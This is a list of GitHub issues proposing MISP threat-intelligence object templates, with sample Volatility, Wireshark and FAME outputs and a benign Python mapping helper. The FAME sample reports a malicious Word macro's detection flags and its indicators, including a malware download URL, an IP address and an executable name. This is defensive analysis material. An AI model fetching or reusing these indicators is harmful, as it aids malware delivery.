
misp-objects's Issues

Object: Log Entry

It would be nice to have a dedicated object for "log-Entry" that can then be used to build a timeline

  • Timestamp (UTC)
  • Timestamp description (e.g. in what log have you found it)
  • System (e.g. which system is your log entry covering)
  • Event description / raw log line
  • Notes
  • involved user
  • Added by
  • malicious yes / no

That way you could create a nice timeline during an investigation

sandbox-signature

I see there is a sandbox-report object where it is possible to load the raw output from a sandbox, but there isn't a tiny object such as sandbox-signature where one can put the signatures that are matching (like the av-signature object).
Example of signatures:
image

json of signatures:
image

At least to have the description and the name; with data (also if it is interesting) the object will go wider.
I'm wondering about something like this definition.json:
image

What do you think?

Script object template

Script object template - to store extracted evidence where a script is involved (from PowerShell to bash) and allow to trace timelines with the object relationship and maybe extend MISP to have syntax highlighting for such object.

Extend whois object + misp attributes

  1. add new misp attribute whois-registrant-org (used by domaintools for example)
  2. add new object relation to whois field registrant-org
  3. rename registant to registrant in whois object

Cowrie honeypot object

Cowrie honeypot object first version released.

| Object attribute | MISP attribute type | Description | Disable correlation |
|---|---|---|---|
| message | text | Message of the cowrie honeypot | |
| username | text | Username related to the password(s) | |
| protocol | text | Protocol used in the cowrie honeypot | |
| src_ip | ip-src | Source IP address of the session | |
| eventid | text | Eventid of the session in the cowrie honeypot | |
| dst_ip | ip-dst | Destination IP address of the session | |
| session | text | Session id | |
| system | text | System origin in cowrie honeypot | |
| src_port | port | Source port of the session | |
| timestamp | datetime | When the event happened | |
| sensor | text | Cowrie sensor name | |
| passsword | text | Password | |
| isError | text | isError | |
| dst_port | port | Destination port of the session | |

https://www.misp-project.org/objects.html#_cowrie

Based on the following discussion on Twitter, we might need to update the object to support malware sample collected and SSH meta information.

Whois object - typo

"registar": {
"description": "Registar of the whois entry",
"ui-priority": 0,
"misp-attribute": "whois-registar"
}

Should be whois-registrar

ASN object to add

ASN object including ASN number, description, country code, list of subnet announced (multiple), first_seen, last_seen, import(multiple), export (multiple), mp-import (multiple), mp-export (multiple).

Volatility - objects

mutantscan

JSON export field name

"columns": [
    "Offset(P)",
    "Pointers",
    "Handles",
    "Signal",
    "Thread",
    "CID",
    "Name"
  ]
[33379968, 1, 1, "1", 0, "", ""], [33382448, 2, 1, "1", 0, "", "746bbf3569adEncrypt"], [33387864, 1, 1, "1", 0, "", ""], [33394584, 1, 1, "1", 0, "", ""], [33427592, 2, 1, "1", 0, "", "_SHuassist.mtx"]

SSDT

  "columns": [
    "Table",
    "TableOffset",
    "NumEntries",
    "Entry",
    "Addr",
    "Function",
    "Owner"
  ]
[
      "SSDT[1]",
      3214515072,
      667,
      4761,
      3214226858,
      "NtGdiUMPDEngFreeUserMem",
      "win32k.sys"
    ],
    [
      "SSDT[1]",
      3214515072,
      667,
      4762,
      3212932649,
      "NtGdiDrawStream",
      "win32k.sys"
    ]

modules

 "columns": [
    "Offset(V)",
    "Name",
    "Base",
    "Size",
    "File"
  ]
   [
      2182709560,
      "ParVdm.SYS",
      4173201408,
      8192,
      "\\SystemRoot\\System32\\Drivers\\ParVdm.SYS"
    ],
    [
      2183500848,
      "srv.sys",
      4152414208,
      335872,
      "\\SystemRoot\\system32\\DRIVERS\\srv.sys"
    ],
    [
      2182893856,
      "HTTP.sys",
      4150018048,
      266240,
      "\\SystemRoot\\System32\\Drivers\\HTTP.sys"
    ]

connscan

{
  "rows": [
    [
      34108960,
      "172.16.112.128:1038",
      "41.168.5.140:8080",
      1484
    ],
    [
      37388296,
      "172.16.112.128:1037",
      "125.19.103.198:8080",
      1484
    ]
  ],
  "columns": [
    "Offset(P)",
    "LocalAddress",
    "RemoteAddress",
    "PID"
  ]
}

This one can be easily mapped to netflow object.
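The connscan-to-netflow mapping mentioned above, sketched as an added example (not code from the issue or from the misp-objects project). It assumes the netflow object relations are named `ip-src`, `ip-dst`, `src-port` and `dst-port`, and that `LocalAddress` is treated as the source side; the `rows`/`columns` helper also works for the other Volatility plugin outputs shown in this issue.

```python
import ipaddress
import json

# Sample input: the connscan JSON export quoted in the issue above.
CONNSCAN_JSON = """
{
  "rows": [
    [34108960, "172.16.112.128:1038", "41.168.5.140:8080", 1484],
    [37388296, "172.16.112.128:1037", "125.19.103.198:8080", 1484]
  ],
  "columns": ["Offset(P)", "LocalAddress", "RemoteAddress", "PID"]
}
"""
SAMPLE_REPORT = json.loads(CONNSCAN_JSON)


def rows_to_records(report):
    """Pair Volatility's 'columns' with every entry of 'rows'.

    Rows whose length does not match the column list (truncated or
    corrupted output) are dropped instead of being silently misaligned.
    """
    columns = report["columns"]
    return [dict(zip(columns, row))
            for row in report.get("rows", [])
            if len(row) == len(columns)]


def split_endpoint(endpoint):
    """Split 'a.b.c.d:port' into (ip, port); raise ValueError if invalid."""
    host, sep, port = str(endpoint).rpartition(":")
    if not sep:
        raise ValueError(f"no port separator in {endpoint!r}")
    ip = ipaddress.ip_address(host)      # ValueError on a bad address
    port_number = int(port)              # ValueError on a non-numeric port
    if not 0 <= port_number <= 65535:
        raise ValueError(f"port out of range in {endpoint!r}")
    return str(ip), port_number


def connscan_to_netflow(report):
    """Return (objects, skipped): netflow-style dicts and rejected records.

    connscan carves connection structures from memory, so carved garbage
    is expected; invalid endpoints are reported back, not stored.
    Assumption: relation names follow the netflow object, and
    LocalAddress is used as the source because connscan gives no direction.
    """
    objects, skipped = [], []
    for record in rows_to_records(report):
        try:
            src_ip, src_port = split_endpoint(record["LocalAddress"])
            dst_ip, dst_port = split_endpoint(record["RemoteAddress"])
            comment = (f"volatility connscan, PID {record['PID']}, "
                       f"Offset(P) {record['Offset(P)']}")
        except (KeyError, ValueError):
            skipped.append(record)
            continue
        objects.append({
            "name": "netflow",
            "comment": comment,
            "Attribute": [
                {"object_relation": "ip-src", "type": "ip-src", "value": src_ip},
                {"object_relation": "src-port", "type": "port", "value": str(src_port)},
                {"object_relation": "ip-dst", "type": "ip-dst", "value": dst_ip},
                {"object_relation": "dst-port", "type": "port", "value": str(dst_port)},
            ],
        })
    return objects, skipped


if __name__ == "__main__":
    netflow_objects, rejected = connscan_to_netflow(SAMPLE_REPORT)
    print(json.dumps(netflow_objects, indent=2))
    print(f"{len(rejected)} record(s) rejected")
```

The PID and physical offset are kept in the object comment so each netflow entry can be traced back to the memory image it was carved from.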

wireshark format object

{"timestamp" : "1038497564094", "layers" : {"frame": {"frame_frame_encap_type": "1","frame_frame_time": "Nov 28, 2002 16:32:44.094214000 CET","frame_frame_offset_shift": "0.000000000","frame_frame_ti
me_epoch": "1038497564.094214000","frame_frame_time_delta": "0.135987000","frame_frame_time_delta_displayed": "0.135987000","frame_frame_time_relative": "294.809766000","frame_frame_number": "32","fr
ame_frame_len": "220","frame_frame_cap_len": "220","frame_frame_marked": "0","frame_frame_ignored": "0","frame_frame_protocols": "eth:ethertype:ip:udp:dns"},"eth": {"eth_eth_dst": "00:80:5f:25:84:37"
,"eth_dst_eth_dst_resolved": "CompaqCo_25:84:37","eth_dst_eth_addr": "00:80:5f:25:84:37","eth_dst_eth_addr_resolved": "CompaqCo_25:84:37","eth_dst_eth_lg": "0","eth_dst_eth_ig": "0","eth_eth_src": "0
0:01:02:09:88:f9","eth_src_eth_src_resolved": "BbnBoltB_09:88:f9","eth_src_eth_addr": "00:01:02:09:88:f9","eth_src_eth_addr_resolved": "BbnBoltB_09:88:f9","eth_src_eth_lg": "0","eth_src_eth_ig": "0",
"eth_eth_type": "0x00000800"},"ip": {"ip_ip_version": "4","ip_ip_hdr_len": "20","ip_ip_dsfield": "0x00000000","ip_dsfield_ip_dsfield_dscp": "0","ip_dsfield_ip_dsfield_ecn": "0","ip_ip_len": "206","ip
_ip_id": "0x00008903","ip_ip_flags": "0x00000000","ip_flags_ip_flags_rb": "0","ip_flags_ip_flags_df": "0","ip_flags_ip_flags_mf": "0","ip_ip_frag_offset": "0","ip_ip_ttl": "61","ip_ip_proto": "17","i
p_ip_checksum": "0x0000afd5","ip_ip_checksum_status": "2","ip_ip_src": "194.154.192.1","ip_ip_addr": "194.154.192.1","ip_ip_src_host": "194.154.192.1","ip_ip_host": "194.154.192.1","ip_ip_dst": "192.
168.1.2","ip_ip_addr": "192.168.1.2","ip_ip_dst_host": "192.168.1.2","ip_ip_host": "192.168.1.2","ip_text": "Source GeoIP: Luxembourg","text_ip_geoip_src_country": "Luxembourg","text_ip_geoip_country
": "Luxembourg","ip_text": "Destination GeoIP: Unknown"},"udp": {"udp_udp_srcport": "53","udp_udp_dstport": "1025","udp_udp_port": "53","udp_udp_port": "1025","udp_udp_length": "186","udp_udp_checksu
m": "0x0000d8a6","udp_udp_checksum_status": "2","udp_udp_stream": "2"},"dns": {"dns_dns_response_to": "31","dns_dns_time": "0.135987000","dns_dns_id": "0x00004e02","dns_dns_flags": "0x00008580","dns_
flags_dns_flags_response": "1","dns_flags_dns_flags_opcode": "0","dns_flags_dns_flags_authoritative": "1","dns_flags_dns_flags_truncated": "0","dns_flags_dns_flags_recdesired": "1","dns_flags_dns_fla
gs_recavail": "1","dns_flags_dns_flags_z": "0","dns_flags_dns_flags_authenticated": "0","dns_flags_dns_flags_checkdisable": "0","dns_flags_dns_flags_rcode": "0","dns_dns_count_queries": "1","dns_dns_
count_answers": "1","dns_dns_count_auth_rr": "2","dns_dns_count_add_rr": "2","dns_text": "Queries","text_text": "71.60.64.158.in-addr.arpa: type PTR, class IN","text_dns_qry_name": "71.60.64.158.in-a
ddr.arpa","text_dns_qry_name_len": "25","text_dns_count_labels": "6","text_dns_qry_type": "12","text_dns_qry_class": "0x00000001","dns_text": "Answers","text_text": "71.60.64.158.in-addr.arpa: type P
TR, class IN, gilmore.ael.be","text_dns_resp_name": "71.60.64.158.in-addr.arpa","text_dns_resp_type": "12","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "86400","text_dns_resp_len": "16","
text_dns_ptr_domain_name": "gilmore.ael.be","dns_text": "Authoritative nameservers","text_text": "60.64.158.in-addr.arpa: type NS, class IN, ns arthur.crpht.lu","text_dns_resp_name": "60.64.158.in-ad
dr.arpa","text_dns_resp_type": "2","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "86400","text_dns_resp_len": "17","text_dns_ns": "arthur.crpht.lu","text_text": "60.64.158.in-addr.arpa: ty
pe NS, class IN, ns dorado.crpht.lu","text_dns_resp_name": "60.64.158.in-addr.arpa","text_dns_resp_type": "2","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "86400","text_dns_resp_len": "9"
,"text_dns_ns": "dorado.crpht.lu","dns_text": "Additional records","text_text": "arthur.crpht.lu: type A, class IN, addr 158.64.4.8","text_dns_resp_name": "arthur.crpht.lu","text_dns_resp_type": "1",
"text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "58747","text_dns_resp_len": "4","text_dns_a": "158.64.4.8","text_text": "dorado.crpht.lu: type A, class IN, addr 158.64.4.9","text_dns_resp_n
ame": "dorado.crpht.lu","text_dns_resp_type": "1","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "56032","text_dns_resp_len": "4","text_dns_a": "158.64.4.9"}}}

FAME format

{
  "analysis": {
    "support_files": {},
    "logs": [
      "2017-03-24 11:17: debug: Trying to queue module 'apk'",
      "2017-03-24 11:17: debug: Trying to queue module 'eml'",
      "2017-03-24 11:17: debug: Trying to queue module 'office_macros'",
      "2017-03-24 11:17: debug: Trying to queue module 'pdf'",
      "2017-03-24 11:17: debug: Trying to queue module 'zip'",
      "2017-03-24 11:17: debug: Trying to queue module 'bamfdetect'",
      "2017-03-24 11:17: debug: Trying to run office_macros",
      "2017-03-24 11:17: debug: Done with office_macros"
    ],
    "extractions": [],
    "results": {
      "office_macros": {
        "macros": "[obfuscated VBA macro source omitted]",
        "analysis": {
          "VBA String": [],
          "Dridex String": [],
          "Suspicious": [
            [
              "Hex Strings",
              "Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)"
            ],
            [
              "Chr",
              "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
            ],
            [
              "StrReverse",
              "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
            ],
            [
              "Shell",
              "May run an executable file or a system command"
            ],
            [
              "Environ",
              "May read system environment variables"
            ],
            [
              "URLDownloadToFileA",
              "May download files from the Internet"
            ],
            [
              "Lib",
              "May run code from a DLL"
            ]
          ],
          "Hex String": [
            [
              "\\vGJsdfbJHKdsf.exe",
              "5C76474A736466624A484B6473662E657865"
            ],
            [
              "TEMP",
              "54454D50"
            ]
          ],
          "Form String": [],
          "Base64 String": [],
          "AutoExec": [
            [
              "Workbook_Open",
              "Runs when the Excel Workbook is opened"
            ],
            [
              "AutoOpen",
              "Runs when the Word document is opened"
            ]
          ],
          "IOC": [
            [
              "94.136.57.72",
              "IPv4 address (obfuscation: StrReverse+Hex)"
            ],
            [
              "vGJsdfbJHKdsf.exe",
              "Executable file name (obfuscation: Hex)"
            ],
            [
              "http://94.136.57.72:8080/mopsi/popsi.php",
              "URL (obfuscation: StrReverse+Hex)"
            ]
          ]
        }
      }
    },
    "module": null,
    "date": {
      "$date": 1490354278607
    },
    "file": {
      "owners": [
        "cert",
        "*"
      ],
      "sha1": "d34317a440d28aaa4a4d7a480dbb89f15fa015bf",
      "names": [
        "DEC2248QO.doc"
      ],
      "probable_names": [],
      "parent_analyses": [],
      "antivirus": {},
      "sha256": "097d1b970439b86467bfae966d18f557b1b908e530902253b24c4180458f51e1",
      "detailed_type": "Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: 1, Template: Normal, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 10:00, Create Time/Date: Mon Nov 24 10:22:00 2014, Last Saved Time/Date: Tue Jan 13 06:25:00 2015, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0",
      "mime": "application/msword",
      "analysis": [
        {
          "$oid": "58d4f256014ed28a5d50c113"
        }
      ],
      "groups": [
        "cert",
        "*"
      ],
      "_id": {
        "$oid": "58d4f256014ed28a5d50c112"
      },
      "type": "word",
      "md5": "757e9b7209f0d6ef3cf7bfd904445009"
    },
    "iocs": [],
    "executed_modules": [
      "office_macros"
    ],
    "probable_names": [],
    "extracted_files": [],
    "status": "finished",
    "tags": [
      "office_macros"
    ],
    "groups": [
      "cert",
      "*"
    ],
    "pending_modules": [],
    "analyst": {
      "$oid": "58d4e81b014ed25aaa77fabf"
    },
    "waiting_modules": [],
    "canceled_modules": [],
    "threat_intelligence": {},
    "generated_files": {},
    "_id": {
      "$oid": "58d4f256014ed28a5d50c113"
    },
    "options": {}
  }
}

x509 add relationship

This relation should be used to link x509 certificates between them to create the certification chain. It should be used to link a PE object or url object too.

    {
      "name": "signed-by",
      "description": "This relationship describes an object signed by another object.",
      "format": [
        "misp"
      ]
    },

Regkey object

In the same way as the Path object, #89

we have different states for the reg keys:

  • used for persistence

  • read to steal information

  • set the malware configuration like proxy settings

MISP-Modules - Object question

Quick question, as I can't find any answer either in the documentation or on GitHub. Can someone point me to an example of code where "object" is used in a misp module (expansion)?

x509 attribute types are different than normal attribute types

An existing attribute type is x509-fingerprint-sha1, however the x509 misp object defines the misp-attribute as md5, sha1, sha256.

This has 2 downsides:

  1. searching for attribute types like x509-fingerprint-sha1 (PyMISP and web interface) will not return x509 misp-object attributes
  2. a dump of (any) md5, sha1, sha256 which are everywhere else used for filenames, will also contain hashes related to x509 certificates; which is illogical

The proposal is thus to change the x509 object type to the

  1. already existing x509-fingerprint-sha1
  2. newly created x509-fingerprint-md5, and x509-fingerprint-sha256

What do you think?
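The two downsides listed in this issue can be reproduced on a small event, shown here as an added example that is not part of the issue and is not MISP or PyMISP code. The event dictionary, its hash values and the `object_relation` names are constructed for illustration; `apply_proposal` is a hypothetical helper that retypes x509 object hashes as the issue proposes.

```python
import copy

# Constructed sample event: a plain file hash, a standalone certificate
# fingerprint, and an x509 object whose fingerprint carries the generic
# "sha1" type, as the issue describes. All values are made up.
EVENT = {
    "Attribute": [
        {"type": "sha1", "value": "a" * 40},                   # dropped file
        {"type": "x509-fingerprint-sha1", "value": "b" * 40},  # standalone cert
    ],
    "Object": [
        {"name": "x509", "Attribute": [
            {"type": "sha1", "object_relation": "fingerprint", "value": "c" * 40},
            {"type": "text", "object_relation": "issuer", "value": "CN=Example CA"},
        ]},
    ],
}

# Dedicated types named in the proposal (md5 and sha256 are the new ones).
X509_TYPES = {
    "md5": "x509-fingerprint-md5",
    "sha1": "x509-fingerprint-sha1",
    "sha256": "x509-fingerprint-sha256",
}


def iter_attributes(event):
    """Yield every attribute, top-level ones first, then those inside objects."""
    yield from event.get("Attribute", [])
    for obj in event.get("Object", []):
        yield from obj.get("Attribute", [])


def search_by_type(event, attr_type):
    """Return the values of all attributes whose type matches exactly."""
    return [a["value"] for a in iter_attributes(event) if a["type"] == attr_type]


def apply_proposal(event):
    """Return a copy in which x509 object hashes use the dedicated x509 types."""
    fixed = copy.deepcopy(event)
    for obj in fixed.get("Object", []):
        if obj["name"] != "x509":
            continue  # hashes in other objects (e.g. file) keep their type
        for attr in obj["Attribute"]:
            attr["type"] = X509_TYPES.get(attr["type"], attr["type"])
    return fixed
```

Before the change, a search for `x509-fingerprint-sha1` misses the certificate stored in the object and a `sha1` dump includes it; after `apply_proposal` both searches return what an analyst would expect.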

Diameter object generic

Diameter object generic

Session-Id
Origin-Host
Origin-Realm
Destination-Realm
Destination-Host
User-Name (usually IMSI SS7)

x509 add fields (certigo)

The Certigo tool can dump certificate information to JSON format.
It would be nice if we had more fields in x509 according to this tool.
You can find an example of .json dumped by certigo:
dumped-json.txt

Some interesting fields are:

  • is_self_signed (boolean)
  • is_ca (boolean)
  • pem
  • dns_names (multiple)
  • key_usage (multiple). E.g. Digital Signature
  • extended_key_usage (multiple). E.g. Server auth
  • ocsp_server
  • issuing_certificate

The Subject field and Issuer field are subdivided according to RFC 5280 (page 20) as follows:

  • common_name
  • country
  • organization
  • organizational unit
  • distinguished name qualifier
  • state or province name
  • serial number
  • locality
  • title
  • surname
  • given name
  • initials
  • pseudonym
  • generation qualifier
  • key_id

Two solutions. The first one is to rename the existing fields to "subject-common-name", "subject-country", "issuer-common-name", "issuer-country", etc.
The second is to create an object "subject" and "issuer" with these attributes. I don't know which is best :)

incorrect object names "domain|ip" and "ip|port"

Hi all,

IMHO the object names "domain|ip" and "ip|port" should read "domain-ip" and "ip-port". Otherwise, an exception "UnknownMISPObjectTemplate" could be thrown if:

  • an existing Event which contains at least one of these objects is loaded by PyMISP:
  • load() method in mispevent.py calls "set_all_values" (line 397) calls "from_dict"
  • line 480: tmp_object = MISPObject(obj['name']) whereas obj['name'] results in either "domain|ip" or "ip|port", which are not valid object names, leading to the exception

Path object

Path object following a discussion with @sebdraven we would need an object which includes the following:

  • A complete path
  • The split path (for correlation)
  • Objective of the path (malware inner operation, stealing and ...)

Split email objects

Split email message and email addresses to keep the relation between addresses and display names

RAT config object?

RAT config object? Following the talk from @bambenek, we might need a generic misp-object for the RAT or malware configuration.

The idea is to store the JSON in that object but we might need some metadata. @bambenek do you see the required metadata which would be needed?

MapSmsTP-DCS value set to 0 is considered as empty value

In the object Ss7-attack when I try to add a TP-DCS with value 0, MISP is returning the following error:

Could not save object as at least one attribute has failed validation (MapSmsTP-DCS). {"value":["Value cannot be empty."]}

Category selected is "Other" by default for the field.

When I validate the object without the field then try to edit it again to add MapSmsTP-DCS with value 0, no error is displayed but the field addition is silently dropped.
